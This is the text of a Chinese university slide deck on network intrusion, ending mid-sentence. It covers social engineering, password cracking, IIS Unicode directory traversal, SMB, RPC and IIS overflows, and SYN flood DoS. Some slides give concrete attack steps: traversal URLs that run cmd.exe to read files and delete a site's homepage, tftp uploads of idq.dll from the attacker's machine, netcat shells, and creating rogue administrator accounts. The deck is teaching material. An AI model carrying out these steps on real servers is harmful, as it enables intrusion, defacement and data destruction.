网络安全第五章.ppt

1、第五章 网络入侵,5,内容提要,本章是攻击技术中最重要的一章，介绍目前常用的网络攻击手段： 社会工程学攻击 物理攻击 暴力攻击 利用Unicode漏洞攻击 利用缓冲区溢出漏洞进行攻击等技术。 介绍流行的攻击工具的使用以及部分工具的代码实现。,社会工程学攻击,社交工程是使用计谋和假情报去获得密码和其他敏感信息的科学，研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体，因此黑客不断试图寻找更加精妙的方法从他们希望渗透的组织那里获得信息。 举个例子：一组高中学生曾经想要进入一个当地的公司的计算机网络，他们拟定了一个表格，调查看上去显得是无害的个人信息，例如所有秘书和行政人员和他们的配偶、孩子

2、的名字，这些从学生转变成的黑客说这种简单的调查是他们社会研究工作的一部分。利用这份表格这些学生能够快速的进入系统，因为网络上的大多数人是使用宠物和他们配偶名字作为密码。,社会工程学攻击,目前社会工程学攻击主要包括两种方式：打电话请求密码和伪造Email 1、打电话请求密码 尽管不像前面讨论的策略那样聪明，打电话寻问密码也经常奏效。在社会工程中那些黑客冒充失去密码的合法雇员，经常通过这种简单的方法重新获得密码。 2、伪造Email 使用telnet一个黑客可以截取任何一个身份证发送Email的全部信息，这样的Email消息是真的，因为它发自于一个合法的用户。在这种情形下这些信息显得是绝对的真实。

3、黑客可以伪造这些。一个冒充系统管理员或经理的黑客就能较为轻松的获得大量的信息，黑客就能实施他们的恶意阴谋。,物理攻击与防范,物理安全是保护一些比较重要的设备不被接触。 物理安全比较难防，因为攻击往往来自能够接触到物理设备的用户。,案例5-1得到管理员密码,用户登录以后，所有的用户信息都存储在系统的一个进程中，这个进程是：“winlogon.exe”，可以利用程序将当前登录用户的密码解码出来。,案例5-1得到管理员密码,使用FindPass等工具可以对该进程进行解码，然后将当前用户的密码显示出来。将FindPass.exe拷贝到C盘根目录，执行该程序，将得到当前用户得登录名。,权限提升,管理员为

4、了安全，给其他用户建立一个普通用户帐号。 用普通用户帐号登录后，可以利用工具GetAdmin.exe将自己加到管理员组或者新建一个具有管理员权限的用户。,案例5-2 普通用户建立管理员帐号,利用Hacker帐户登录系统，在系统中执行程序GetAdmin.exe，程序自动读取所有用户列表，在对话框中点击按钮“New”，在框中输入要新建的管理员组的用户名。,普通用户建立管理员帐号,输入一个用户名“IAMHacker”，点击按钮“确定”以后，然后点击主窗口的按钮“OK”，出现添加成功的窗口。,暴力攻击,暴力攻击的一个具体例子是，一个黑客试图使用计算机和信息去破解一个密码。 一个黑客需要破解一段单一的

5、被用非对称密钥加密的信息，为了破解这种算法，一个黑客需要求助于非常精密复杂的方法，使用120个工作站，两个超级计算机利用从三个主要的研究中心获得的信息，即使拥有这种配备，也将花掉八天的时间去破解加密算法，实际上破解加密过程八天已是非常短暂的时间了。,字典文件,一次字典攻击能否成功，很大因素上决定与字典文件。一个好的字典文件可以高效快速的得到系统的密码。攻击不同的公司、不通地域的计算机，可以根据公司管理员的姓氏以及家人的生日，可以作为字典文件的一部分，公司以及部门的简称一般也可以作为字典文件的一部分，这样可以大大的提高破解效率。 一个字典文件本身就是一个标准的文本文件，其中的每一行就代表一个可能

6、的密码。,暴力破解操作系统密码,字典文件为暴力破解提供了一条捷径，程序首先通过扫描得到系统的用户，然后利用字典中每一个密码来登录系统，看是否成功，如果成功则将密码显示 利用上一章介绍的工具软件GetNTUser依然可以将管理员密码破解出来。,暴力破解邮箱密码,邮箱的密码一般需要设置到八位以上，否则七位以下的密码容易被破解。 尤其七位全部是数字，更容易被破解。 案例5-4 电子邮箱暴力破解 破解电子邮箱密码，一个比较著名的工具软件是：黑雨POP3邮箱密码暴力破解器，比较稳定的版本是2.3.1。,暴力破解软件密码,目前许多软件都具有加密的功能，比如Office文档、Winzip文档和Winrar文

7、档等等。这些文档密码可以有效的防止文档被他人使用和阅读。但是如果密码位数不够长的话，同样容易被破解。 案例5-5 Office文档暴力破解,修改权限密码,在对话框中选择选项卡“安全性”，在打开权限密码和修改权限密码的两个文本框中都输入“999” 。,输入密码,保存并关闭该文档，然后再打开，就需要输入密码了。,破解Word文档密码,该密码是三位的，使用工具软件，Advanced Office XP Password Recovery可以快速破解Word文档密码。,破解Word文档密码,点击工具栏按钮“Open File”，打开刚才建立的Word文档，程序打开成功后会在Log Window中显示成

8、功打开的消息。,破解Word文档密码,设置密码长度最短是一位，最长是三位，点击工具栏开始的图标，开始破解密码，大约两秒钟后，密码被破解了。,Unicode漏洞专题,通过打操作系统的补丁程序，就可以消除漏洞。只要是针对漏洞进行攻击的案例都依赖于操作系统是否打了相关的补丁。 Unicode漏洞受影响的版本： Microsoft IIS 5.0+Microsoft Windows 2000系列版本 Microsoft IIS 4.0+ Microsoft Windows NT 4.0 消除该漏洞的方式是安装操作系统的补丁，只要安装了SP1以后，该漏洞就不存在了。微软IIS 4.0和5.0都存在利用扩

9、展UNICODE字符取代/和而能利用./目录遍历的漏洞。,Unicode漏洞的检测方法,使用扫描工具来检测Unicode漏洞是否存在，使用上一章介绍的X-Scan来对目标系统进行扫描，目标主机IP为：09，Unicode漏洞属于IIS漏洞，所以这里只扫描IIS漏洞就可以了。,Unicode漏洞的检测方法,将主机添加到目标地址。,Unicode漏洞的检测方法,可以看出，存在许多系统的漏洞。只要是/scripts开头的漏洞都是Unicode漏洞。比如： /scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir 其中/scripts目录是I

10、IS提供的可以执行命令的一个有执行程序权限的一个目录。,Unicode漏洞的检测方法,scripts目录一般系统盘根目录下的Inetpub目录下。,Unicode漏洞的检测方法,在Windows的目录结构中，可以使用两个点和一个斜线“./”来访问上一级目录，在浏览器中利用“scripts/././”可以访问到系统盘根目录，访问“scripts/././winnt/system32”就访问到系统的系统目录了，在system32目录下包含许多重要的系统文件，比如cmd.exe文件，可以利用该文件新建用户，删除文件等操作。 浏览器地址栏中禁用符号“./”，但是可以使用符号“/”的Unicode的编码

11、。比如 “/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。,Unicode漏洞,此漏洞从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，台湾繁体中文也同样存在这样的漏洞。在NT4中/编码为“%c1%9c”或者“%c1%9c”，WIN2000英文版是“%c0%af”。 但从国外某些站点得来的资料显示，还有以下的编码可以实现对该漏洞的检测，该编码存在于日文版、韩文版等操作系统。 %c1%pc %c0

12、%9v %c0%qf %c1%8s %e0%80%af 利用该漏洞读取出计算机上目录列表，比如读取C盘的目录，只要在浏览器中输入 “09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:”,利用Unicode漏洞读取系统盘目录,漏洞分析：从上面的检测中，可以清楚地看到：“http:/x.x.x.x/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+”之后就是DOS命令：dir如果我们换成：http:/x.x.x.x/scripts/.%c0%2f./winnt/system3

13、2/cmd.exe?/c+dir+d:那么，你就可以看到目标主机的 D: 的内容。（这里用到的命令是：dir）如果我们换成：http:/x.x.x.x/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+type+d:aaa.bat那么，你就可以看到目标主机的 D:aaa.bat 文件 的内容。（这里用到的命令是：type）,利用Unicode漏洞读取系统盘目录,利用语句得到对方计算机上装了几个操作系统以及操作系统的类型，只要读取C盘下的boot.ini文件就可以了。使用的语句是： 09/scripts/.%c0%2f./wi

14、nnt/system32/cmd.exe?/c+type+c:boot.ini 执行的结果如图所示。,利用Unicode漏洞删除主页,利用Unicode可以方便的更改对方的主页，比如现在已经知道对方网站的根路径在“C:Initpubwwwroot”（系统默认）下，可以删除该路径下的文件“default.asp”来删除主页，这里的“default.asp”文件是IIS的默认启动页面。 使用的语句是： 09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+del+c:inetpubwwwrootdefault.asp,利用Un

15、icode漏洞删除主页,拷贝文件,为了是使用方便，利用语句将cmd.exe文件拷贝到scripts目录，并改名为c.exe，使用的语句是： 09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+copy+C:winntsystem32cmd.exe+c.exe 程序执行结果如图所示。,查看C盘的目录,以后使用cmd.exe命令就方便了，比如查看C盘的目录，使用的语句就可以简化为： 09/scripts/c.exe?/c+dir+c: 执行的结果如图所示。,利用Unicode漏洞入侵系统,在

16、地址栏上执行命令，用户的权限比较低，像net等系统管理指令不能执行。利用Unicode可以入侵对方的系统，并得到管理员权限。首先需要向对方服务器上传一些文件，入侵的第一步，建立tftp服务器，向对方的scripts文件夹传几个文件。 需要上传一个名为“idq.dll”的文件，为了上传这个文件，首先在本地计算机上搭建一个TFTP服务器，普通文件传输协议TFTP（Text File Transmission Protocol）一般用来传输单个文件。使用工具软件tftpd32.exe建立服务器。将idq.dll和tftpd32.exe放在本地的同一目录下，执行tftpd32.exe程序。,利用Uni

17、code漏洞入侵系统,利用Unicode漏洞入侵系统,这样在本地的TFTP的服务器就建立好了，保留这个窗口，通过该服务器向对方传递idq.dll文件。在浏览器中执行命令： “09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll”， 命令其实是“tftp i 10 get idq.dll”意思是从10服务器上获取idq.dll文件。,上载文件,查看scripts目录,上传完毕后可以查看一下scripts目录，是否真

18、的上传成功了。,入侵对方主机,说明已经成功的在scripts目录中上传了一个idq.dll文件，下面使用工具软件ispc.exe入侵对方系统。 拷贝ispc.exe文件到本地计算机的C盘根目录，在DOS命令行下执行命令： “ispc.exe 09/scripts/idq.dll”，连接成功后就直接进入了对方的DOS命令行下，而且具有管理员权限。,建立用户,可以在对方计算机上做管理员可以做的一切事情，比如添加用户，建立一个用户名为“Hacker123”，密码也是“Hacker123”的用户。,其他漏洞攻击,利用打印漏洞 利用打印漏洞可以在目标的计算机上添加一个具有管理员权限

19、的用户。经过测试，该漏洞在SP2、SP3以及SP4版本上依然存在，但是不能保证100%入侵成功。 使用工具软件：cniis.exe，使用的语法格式是：“cniis 09 0”，第一个参数是目标的IP地址，第二参数是目标操作系统的补丁号，因为09没有打补丁，这里就是0。拷贝cniis.exe文件到C盘根目录。,SMB致命攻击,SMB（Session Message Block，会话消息块协议）又叫做NetBIOS或LanManager协议，用于不同计算机之间文件、打印机、串口和通讯的共享和用于Windows平台上提供磁盘和打印机的共享。 SMB协议版本

20、有很多种，在Windows 98、Windows NT、Windows 2000和XP使用的是NTLM 0.12版本。 利用该协议可以进行各方面的攻击，比如可以抓取其他用户访问自己计算机共享目录的SMB会话包，然后利用SMB会话包登录对方的计算机。,致命攻击,使用的工具软件是：SMBDie V1.0，该软件对打了SP3、SP4的计算机依然有效，必须打专门的SMB补丁。,致命攻击,攻击的时候，需要两个参数：对方的IP地址和对方的机器名，窗口中分别输入这两项。,致命攻击,然后再点按钮“Kill”，如果参数输入没有错误的话，对方计算机立刻重启或蓝屏，命中率几乎100%，被攻击的计算机蓝屏界面。,何为

21、溢出,如果把一升的水注入容量为500毫升的容量中，水会四处冒出，这时你就会充分理解溢出的含义。同样的道理，在计算机内部，如果你向一个容量有限的内存空间里存储过量数据，这时数据也会溢 出存储空间。输入数据通常被存放在一个临时空间内，这个临时存放空间被称为缓冲区，缓冲区的长度事先已经被程序或者操作系统定义好了。,何为缓冲区溢出,缓冲区溢出是指当计算机程序向缓冲区内填充的数据位数超过了缓冲区本身的容量。溢出的数据覆盖在合法数据上。理想情况是，程序检查数据长度并且不允许输入超过缓冲区长度的字符串。但是绝大多数程序都会假设数据长度总是与所分配的存储空间相匹配，这就为缓冲区溢出埋下隐患。操作系统所使用的缓

22、冲区又被称为堆栈，在各个操作进程之间，指令被临时存储在堆栈当中，堆栈也会出现缓冲区溢出。,溢出根源在于编程,缓冲区溢出是由编程错误引起的。如果缓冲区被写满，而程序没有去检查缓冲区边界，也没有停止接收数据，这时缓冲区溢出就会发生。 缓冲区溢出之所以泛滥，是由于开放源代码程序的本质决定的。一些编程语言对于缓冲区溢出是具有免疫力的，例如Perl能够自动调节字节排列的大小，Ada95能够检查和阻止缓冲区溢出。但是被广泛使用的C语言却没有建立检测机制。标准C语言具有许多复制和添加字符串的函数，这使得标准C语言很难进行边界检查。C略微好一些，但是仍然存在缓冲区溢出。一般情况下，覆盖其他数据区的数据是没有意

23、义的，最多造成应用程序错误，但是，如果输入的数据是经过“黑客”或者病毒精心设计的，覆盖缓冲区的数据恰恰是“黑客”或者病毒的入侵程序代码，一旦多余字节被编译执行，“黑客”或者病毒就有可能为所欲为，获取系统的控制权。,溢出导致“黑客”病毒横行,缓冲区溢出是病毒编写者和特洛伊木马编写者偏爱使用的一种攻击方法。攻击者或者病毒善于在系统当中发现容易产生缓冲区溢出之处，运行特别程序，获得优先级，指示计算机破坏文件，改变数据，泄露敏感信息，产生后门访问点，感染或者攻击其他计算机。,缓冲区溢出攻击,当一个超长的数据进入到缓冲区时，超出部分就会被写入其他缓冲区，其他缓冲区存放的可能是数据、下一条指令的指针，或者

24、是其他程序的输出内容，这些内容都被覆盖或者破坏掉。可见一小部分数据或者一套指令的溢出就可能导致一个程序或者操作系统崩溃。 这项攻击对技术要求比较高，但是攻击的过程却非常简单。,缓冲区溢出攻击,void function(char * szPara1) char buff16;/创建一个缓冲区 strcpy(buffer, szPara1); 程序中利用strcpy函数将szPara1中的内容拷贝到buff中，只要szPara1的长度大于16，就会造成缓冲区溢出。存在strcpy函数这样问题的C语言函数还有：strcat()、gets()、scanf()等。,RPC漏洞溢出,远程过程调用RPC（

25、Remote Procedure Call)，是操作系统的一种消息传递功能，允许应用程序呼叫网络上的计算机。当系统启动的时候，自动加载RPC服务。可以在服务列表中看到系统的RPC服务。,利用RPC漏洞建立超级用户,RPC溢出漏洞，对SP4也适用，必须打专用补丁。利用工具scanms.exe文件检测RPC漏洞，该工具运行在命令行下用来检测指定IP地址范围内机器是否已经安装了“DCOM RPC 接口远程缓冲区溢出漏洞（823980-MS03-026）”补丁程序。 如果没有安装补丁程序，该IP地址就会显示出“VULN”。首先拷贝该文件到C盘根目录，现在要检查地址段09到172.

26、18.25.110的主机，执行命令“scanms.exe 09-10”。,检查缓冲区溢出漏洞,检查缓冲区溢出漏洞,利用工具软件attack.exe对09进行攻击。攻击的结果将在对方计算机上建立一个具有管理员权限的用户，并终止了对方的RPC服务。 新建用户的用户名和密码都是qing10，这样就可以登录对方计算机了，RPC服务停止操作系统将有许多功能不能使用，非常容易被管理员发现，使用工具软件OpenRpcSs.exe来给对方重启RPC服务。,攻击的全过程,利用IIS溢出进行攻击,案例5-11 利用IIS溢出入侵系统 利用软件Sna

27、ke IIS溢出工具可以让对方的IIS溢出，还可以捆绑执行的命令和在对方计算机上开辟端口。,利用IIS溢出进行攻击,该软件适用于各种类型的操作系统，比如对09进行攻击，09的操作系统的Windows 2000，没有安装补丁程序，攻击完毕后，开辟一个813端口，并在对方计算机上执行命令“dir c:”设置。,点击按钮“IDQ溢出”，出现攻击成功的提示框。,这个时候，813端口已经开放，利用工具软件nc.exe连接到该端口，将会自动执行改才发送的DOS命令“dir c:”，使用的语法是：nc.exe -vv 09 813，其中-vv

28、是程序的参数，813是目标端口。可以看到命令的执行结果。,监听本地端口,下面利用nc.exe和snake工具的另外一种组合入侵对方计算机。首先利用nc.exe命令监听本地的813端口。使用的基本语法是“nc -l -p 813” 。,这个窗口就这样一直保留，启动工具软件snake，本地的IP地址是10，要攻击的计算机的IP地址是09，选择溢出选项中的第一项，设置IP为本地IP地址，端口是813。,设置好以后，点击按钮“IDQ溢出”。,查看nc命令的DOS框，在该界面下，已经执行了设置的DOS命令。将对方计算机的C盘根目录列出来。,利用WebDav远程

29、溢出,需要使用工具软件nc.exe和webdavx3.exe，首先在DOS命令行下执行webdavx3.exe，如果执行的话，该程序将提示已经过期了。,攻击,修改本地系统时间到2001年，这样就可以攻击了，在命令后面直接跟对方的IP地址就可以了，现在要攻击的计算机是09。,入侵对方的计算机,该程序不能自动退出，当发现程序长时间没有反映的时候，需要手工按下“CTRL+C”退出程序。该程序在对方的计算机上开了一个端口7788，依然可以nc.exe程序入侵对方的计算机。,拒绝服务攻击,拒绝服务攻击的简称是：DoS（Denial of Service,也就是“拒绝服务”的意思）攻

30、击，凡是造成目标计算机拒绝提供服务的攻击都称为DoS攻击，其目的是使目标计算机或网络无法提供正常的服务。DDoS（分布式拒绝服务），它的英文全称为Distributed Denial of Service。攻击者利用已经侵入并控制的主机，对某一单机发起攻击，被攻击者控制着的计算机有可能是数百台机器，被攻击的主机很快失去反应，无法提供服务，从而达到攻击的目的。,分布式拒绝服务攻击示意图,Dos攻击方式及原理,对DoS而言，其攻击方式很多，主要使用的攻击有3种，分别是TCP-SYN flood、UDP flood和ICMP flood. 当用户进行一次标准的TCP连接时，会有一个3次握手过程。首先

31、是请求服务方发送一个SYN消息，服务方收到SYN后，会向请求方回送一个SYN-ACK表示确认，当请求方收到SYN-ACK后，再次向服务方发送一个ACK消息，这样，一次TCP连接建立成功。 但是TCP-SYN flood在实现过程中只进行前2个步骤：当服务方收到请求方的SYN-ACK确认消息后，请求方由于采用源地址欺骗等手段使得服务方收不到ACK回应，于是，服务方会在一定时间处于等待接收请求方ACK消息的状态。对于某台服务器来说，可用的TCP连接是有限的，如果恶意攻击方快速连续地发送此类连接请求，该服务器可用的TCP连接队列将很快被阻塞，系统可用资源急剧减少，网络可用带宽迅速缩小，长此下去，网络

32、将无法向用户提供正常的服务。,1.占用大量内存.cpu占用率持续100% 2.被攻击主机上有大量等待的TCP连接 3.网络中充斥着大量的无用的数据包，源地址为假 4.制造高流量无用数据，造成网络拥塞，使受害主机无法正常和外界通讯 5.利用受害主机提供的服务或传输协议上的缺陷，反复高速的发出特定的服务请求，使受害主机无法及时处理所有正常请求 6 .利用服务器系统的或者运行的程序的漏洞造成拒绝服务.严重时会造成系统死机 或者重新启动,遭受ddos攻击的特征,SYN FLOOD,SYN Flood是当前最流行的DoS（拒绝服务攻击）与DDoS（分布式拒绝服务攻击）的方式之一，这是一种利用TCP协议缺陷，发送大量伪造的TCP连接请求，从而使得被攻击方资源耗尽（CPU满负荷或内存不足）的攻击方式。,SynFlood 解决办法,第一种是缩短SYN Timeout时间，由于SYN Flood攻击的效果取决于服务器上保持